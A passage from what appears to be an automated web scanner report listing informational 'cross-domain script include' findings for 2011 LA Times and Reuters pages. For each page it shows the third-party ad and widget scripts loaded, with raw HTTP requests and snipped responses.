"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-
...[SNIP]...
</script><script type="text/javascript" src="http://img1.adjuggler.com/banners/ajtg.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://img1.cdn.adjuggler.com/banners/ajtg.js"></script>
...[SNIP]...
</script><script type='text/javascript' language='JavaScript' src='http://img1.cdn.adjuggler.com/banners/ajtg.js'></script>
...[SNIP]...
in-bottom: 4px;" width="234" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/253106/0/vh?z=greenbiz&dim=219483"><script type="text/javascript" src="http://ads.greenerworldmedia.com/servlet/ajrotator/253106/0/vj?z=greenbiz&dim=219483&abr=$scriptiniframe"></script>
...[SNIP]...
<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/504627/0/vh?z=greenbiz&dim=412551"><script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/504627/0/vj?z=greenbiz&dim=412551&abr=$scriptiniframe"></script>
...[SNIP]...
<iframe width="120" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/283275/0/vh?z=greenbiz&dim=219482&kw=&click="><script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/283275/0/vj?z=greenbiz&dim=219482&kw=&click=&abr=$scriptiniframe"></script>
...[SNIP]...
<div class="feed-content">
<script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/391841/0/vj?z=greenbiz&dim=391839&total=20&adseparator=<BR><BR>"></script>
...[SNIP]...
</script>
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=pB7bRgijiomDdE8hmU_2fvtA_3d_3d"> </script>
...[SNIP]...

21.42. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latimes.com
Path:	/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=160x600,300x600;tile=3;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?
http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=234x60;tile=5;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?
http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=300x250,336x280;tile=2;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?
http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=B;sz=728x91;tile=4;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?
http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?
http://an.tacoda.net/an/g10007/slf.js
http://bleacherreport.com/partner_feeds/latimes/widgets/sidebar.js
http://js.revsci.net/gateway/gw.js?csid=B08725

Request

GET /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z2n1
Last-Modified: Sun, 04 Sep 2011 01:26:14 GMT
Cache-Control: private, max-age=177
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 207445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transiti
...[SNIP]...
<div class="ad centerAd topLeaderboard">
           <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<td vAlign="middle">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=300x250,336x280;tile=2;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<div class="skyScraper">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=160x600,300x600;tile=3;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
</h5>
   <script src="http://bleacherreport.com/partner_feeds/latimes/widgets/sidebar.js"></script>
...[SNIP]...
<div class="ad centerAd">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=B;sz=728x91;tile=4;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<div id="inlineHeaderAd" style="position:absolute; top: 35px; right: 10px; height: 64px;">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=234x60;tile=5;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...


<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...

21.43. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js
http://cdn.echoenabled.com/clientapps/v2/stream.js
http://jlinks.industrybrains.com/jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp
http://platform.linkedin.com/in.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js
https://apis.google.com/js/plusone.js

Request

GET /article/2011/09/03/us-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:41 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:40:38 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:22:35 GMT
CHANNEL-NAME: domesticNews
Last-UpdatedA: Sat, 03 Sep 2011 23:10:32 GMT
Age: 242
Vary: Accept-Encoding
Content-Length: 91149
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:40:38 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn " tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</span>
<script src="http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js"></script>
<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
{"parsetags": "explicit"}
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.44. http://www.reuters.com/assets/commentsChild previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

21.45. http://www.reuters.com/assets/newsFlash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The response dynamically includes the following script from another domain:

http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/newsFlash HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:32 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:48:54 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Vary: Accept-Encoding
Content-Length: 10201
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:48:53 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

21.46. http://www.reuters.com/assets/print previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/print

Issue detail

The response dynamically includes the following script from another domain:

http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/print HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:30 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:22:47 GMT
Content-Length: 7735
Age: 222
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:22:47 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

21.47. http://www.reuters.com/do/emailArticle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/do/emailArticle

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/challenge?k=6LeVRQsAAAAAAOTG4HWZ4aDI7ZHea-FLCdVGwyiC

Request

GET /do/emailArticle HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:03 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 5723
Vary: Accept-Encoding
Connection: close

<LINK href='/resources/css/rcom-master.css' type='text/css' rel='stylesheet'><script language='javascript' src='/resources/js/links.js' type='text/javascript'></script><meta http-equiv="Content-Type"
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LeVRQsAAAAAAOTG4HWZ4aDI7ZHea-FLCdVGwyiC"></script>
...[SNIP]...

21.48. http://www.reuters.com/finance/markets/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/finance/markets/index

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /finance/markets/index HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:36 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:55:51 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:04:41 GMT
Vary: Accept-Encoding
Content-Length: 95556
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:55:52 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.49. http://www.reuters.com/news/archive/topNews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/news/archive/topNews

Issue detail

The response dynamically includes the following script from another domain:

http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /news/archive/topNews HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:40 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:48:55 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Vary: Accept-Encoding
Content-Length: 55547
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:48:56 GMT and will
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.50. http://www.reuters.com/news/pictures/slideshow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/news/pictures/slideshow

Issue detail

The response dynamically includes the following scripts from other domains:

http://services.picadmedia.com/js/clients/reuters.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /news/pictures/slideshow HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:41 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:13:15 GMT
Last-UpdatedL: Sat, 03 Sep 2011 00:20:22 GMT
Vary: Accept-Encoding
Content-Length: 46712
Connection: close
Content-Type: text/html;charset=UTF-8




<script src="http://services.picadmedia.com/js/clients/reuters.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.51. http://www.reuters.com/news/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/news/video

Issue detail

The response dynamically includes the following scripts from other domains:

http://objects.tremormedia.com/embed/js/banners.js
http://platform.linkedin.com/in.js
http://www.googletagservices.com/tag/static/google_services.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /news/video HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:38 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:24:54 GMT
Age: 103
Vary: Accept-Encoding
Content-Length: 52644
Connection: close
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:24:54 GMT and will
...[SNIP]...
</style>

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.52. http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/06/08/dramatic-video-captures-toronto-lightnin

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/06/08/dramatic-video-captures-toronto-lightnin HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:01 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:01 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.53. http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/08/08/england-football-friendly-cancelled-afte

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/08/08/england-football-friendly-cancelled-afte HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:00 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:00 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.54. http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/08/15/football-gains-level-playing-field

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/08/15/football-gains-level-playing-field HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:00 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:01 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.55. http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/08/18/lockheed-martin-presents-airship-of-the

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/08/18/lockheed-martin-presents-airship-of-the HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:56 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:57 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.56. http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/08/22/buenos-aires-fashion-week-sizzles

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/08/22/buenos-aires-fashion-week-sizzles HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:55 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:55 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.57. http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/08/26/experimental-plane-reaches-13000-mph

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/08/26/experimental-plane-reaches-13000-mph HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:57 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:58 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.58. http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/09/02/job-angst-disrupts-stock-market

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/09/02/job-angst-disrupts-stock-market HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:50 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:50 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.59. http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/09/02/job-seeker-finds-job-in-tough-times

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/09/02/job-seeker-finds-job-in-tough-times HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:48 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:49 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
